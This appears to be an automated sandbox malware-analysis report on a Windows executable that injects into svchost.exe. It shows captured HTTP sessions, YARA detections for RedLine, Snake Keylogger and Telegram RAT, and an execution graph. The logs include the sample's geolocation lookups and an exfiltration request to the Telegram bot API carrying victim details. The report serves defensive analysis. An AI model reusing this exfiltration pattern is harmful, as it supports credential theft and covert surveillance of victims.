                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CtOJuvSRUET7FfaSUbayIlCtw7lJYp2UA2HRxT%2BLvrqx3T54PhUfpNkhV2vlXDQ6R7S6tQw54zXp5wVqSa%2BeA5If4RwDYC%2BCpDU92w6ISP%2B5NkcznaEY8%2FRaqa3vPptctW48i%2BzG"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fffac1bea698c0f-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2000&min_rtt=1979&rtt_var=757&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1475492&cwnd=223&unsent_bytes=0&cid=438f69962d16c607&ts=161&x=0"
                                                                                                              2025-01-10 21:13:40 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              4192.168.2.849712104.21.80.14436012C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 21:13:41 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              2025-01-10 21:13:41 UTC861INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 21:13:41 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1858410
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MXoNF6RnHbjw0Q7CkpW1T5%2B5KBD9aabbEsxhyXlPBsGYNuolKqAwYWZS4kbbgfsXyMfiI%2FTiYuWXn4%2FRaBd8YtYesVOV5TpYz39ZoM%2FTz0FrolIrrYY%2BaH4gDt%2FLwTq9UbRPwDx2"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fffac22dcb643ee-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1697&min_rtt=1689&rtt_var=649&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1665715&cwnd=228&unsent_bytes=0&cid=83ede1b3c406f684&ts=157&x=0"
                                                                                                              2025-01-10 21:13:41 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              5192.168.2.849714104.21.80.14436012C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 21:13:42 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-10 21:13:42 UTC855INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 21:13:42 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1858411
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JBQNV6QFiBKUpq9D7S1n0lSQDeLhanLdQcdWUDLvYQYxkdLkUOYjsLJSxKebQVyAw6Omcj33BmSExXsNuaOIGkLyJcFxAMg1r22yAAqhtzKnp%2Fv%2BD1FHhVPIOxphOqPEGRLBy%2B70"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fffac29ac967d0e-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1998&min_rtt=1970&rtt_var=795&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1329085&cwnd=244&unsent_bytes=0&cid=b682b0279603678a&ts=171&x=0"
                                                                                                              2025-01-10 21:13:42 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              6192.168.2.849716104.21.80.14436012C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 21:13:43 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-10 21:13:43 UTC853INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 21:13:43 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1858412
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J7aRSPLh1nADGVIB1ugGOcXlpLtOqmNfYxRhCQeD%2BBVVVaoZw7LHonv4PXnVrH9rcUPyw94tVnxzXQ3ltSMd1J8g3TArYApeDzqWWuUqbmfzlNWfo7FabORuOa2QjjdJGkzs%2Fu4k"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fffac30ae00c443-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1664&min_rtt=1664&rtt_var=625&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1748502&cwnd=244&unsent_bytes=0&cid=7c19c0405ba21e69&ts=158&x=0"
                                                                                                              2025-01-10 21:13:43 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              7192.168.2.849718104.21.80.14436012C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 21:13:44 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-10 21:13:44 UTC857INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 21:13:44 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1858414
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZD8gL426egUc3bnQMS4ixPqhXIliElskB2%2FcsLy6WcCkArwJXU417hyr6yoJopu9q63QXSFrsV6n5pu6HRNHm2CgvjimTw3B0XsB5%2B%2FCfUc4q7dxfj3a6NXICTiJvB1mMvXyxKg%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fffac37afa0c443-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1673&min_rtt=1667&rtt_var=637&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1700640&cwnd=244&unsent_bytes=0&cid=ef256ec3803e54f4&ts=158&x=0"
                                                                                                              2025-01-10 21:13:44 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              8192.168.2.849721104.21.80.14436012C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 21:13:45 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              2025-01-10 21:13:46 UTC859INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 21:13:45 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1858415
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IedbdrN8pOALNAi9raOEcb%2FE37zhg4FxrHiL96YmqyuPuhom5uaH9JysKnumV7iIZ8gOg3NqLgRPLy%2BE1pGcvLs%2BQKn3e3OmZq9zAPH6mX7gO9Vn9cN4z%2B%2BTcUeFegsz3jgSF4kv"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fffac3e68c7c443-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1691&min_rtt=1663&rtt_var=680&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1546610&cwnd=244&unsent_bytes=0&cid=84c19c0da848f60c&ts=146&x=0"
                                                                                                              2025-01-10 21:13:46 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              9192.168.2.849723149.154.167.2204436012C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 21:13:46 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2011/01/2025%20/%2002:29:40%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                              Host: api.telegram.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-10 21:13:46 UTC344INHTTP/1.1 404 Not Found
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 10 Jan 2025 21:13:46 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 55
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-10 21:13:46 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                              Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                              Click to jump to process

                                                                                                              Click to jump to process

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Click to jump to process

                                                                                                              Target ID:0
                                                                                                              Start time:16:13:29
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Users\user\Desktop\lsc5QN46NH.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\lsc5QN46NH.exe"
                                                                                                              Imagebase:0x600000
                                                                                                              File size:80'740'352 bytes
                                                                                                              MD5 hash:7A6425553456C5F24BB5C8E235574C72
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.1516446502.00000000021A0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:2
                                                                                                              Start time:16:13:32
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\lsc5QN46NH.exe"
                                                                                                              Imagebase:0xda0000
                                                                                                              File size:46'504 bytes
                                                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.3932473791.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.3934335927.0000000005341000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Reset < >

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:3.8%
                                                                                                                Dynamic/Decrypted Code Coverage:0.4%
                                                                                                                Signature Coverage:7.7%
                                                                                                                Total number of Nodes:2000
                                                                                                                Total number of Limit Nodes:185
                                                                                                                execution_graph 100871 603633 100872 60366a 100871->100872 100873 6036e7 100872->100873 100874 603688 100872->100874 100915 6036e5 100872->100915 100878 6036ed 100873->100878 100879 63d0cc 100873->100879 100875 603695 100874->100875 100876 60374b PostQuitMessage 100874->100876 100883 6036a0 100875->100883 100884 63d154 100875->100884 100885 6036d8 100876->100885 100877 6036ca DefWindowProcW 100877->100885 100880 6036f2 100878->100880 100881 603715 SetTimer RegisterWindowMessageW 100878->100881 100926 611070 10 API calls Mailbox 100879->100926 100886 6036f9 KillTimer 100880->100886 100887 63d06f 100880->100887 100881->100885 100889 60373e CreatePopupMenu 100881->100889 100890 603755 100883->100890 100891 6036a8 100883->100891 100942 662527 71 API calls _memset 100884->100942 100923 60443a Shell_NotifyIconW _memset 100886->100923 100899 63d074 100887->100899 100900 63d0a8 MoveWindow 100887->100900 100888 63d0f3 100927 611093 341 API calls Mailbox 100888->100927 100889->100885 100916 6044a0 100890->100916 100895 6036b3 100891->100895 100896 63d139 100891->100896 100902 6036be 100895->100902 100903 63d124 100895->100903 100896->100877 100941 657c36 59 API calls Mailbox 100896->100941 100897 63d166 100897->100877 100897->100885 100904 63d097 SetFocus 100899->100904 100905 63d078 100899->100905 100900->100885 100901 60370c 100924 603114 DeleteObject DestroyWindow Mailbox 100901->100924 100902->100877 100928 60443a Shell_NotifyIconW _memset 100902->100928 100940 662d36 81 API calls _memset 100903->100940 100904->100885 100905->100902 100909 63d081 100905->100909 100925 611070 10 API calls Mailbox 100909->100925 100911 63d134 100911->100885 100913 63d118 100929 60434a 100913->100929 100915->100877 100917 6044b7 _memset 100916->100917 100918 604539 100916->100918 100943 60407c 100917->100943 100918->100885 100920 604522 KillTimer SetTimer 100920->100918 100921 6044de 100921->100920 100922 63d4ab Shell_NotifyIconW 100921->100922 100922->100920 100923->100901 100924->100885 100925->100885 100926->100888 100927->100902 100928->100913 100930 604375 _memset 100929->100930 101062 604182 